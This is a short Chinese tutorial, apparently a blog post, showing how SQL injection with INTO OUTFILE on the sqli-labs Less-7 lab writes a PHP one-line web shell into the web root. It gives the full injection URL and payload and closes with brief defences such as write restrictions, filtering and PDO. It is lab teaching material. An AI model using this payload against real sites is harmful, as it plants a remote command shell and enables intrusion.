本文介绍如何通过SQL注入利用outfile语法来实现文件写入,包括PHP一句话木马的植入过程,并提出了相应的防御措施。
结合PHP一句话木马
利用outfile生成文件
利用条件
1、文件具有写的条件
2、知道绝对路径
以sql-lab第七关为例
http://192.168.3.10/sqli/Less-7/?id=1——》
http://192.168.3.10/sqli/Less-7/?id=1’ union select xxx into outfile ‘绝对路径’ --+
——》http://192.168.3.10/sqli/Less-7/?id=1’ union select 1,2,’<?php eval($_POST["cmd"]);?>’ into outfile ‘D:\phpStudy\PHPTutorial\WWW\sqli\Less-7\kk.php’
查看一下生成的kk.php
防御:
不开启写条件
过滤
PDO
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
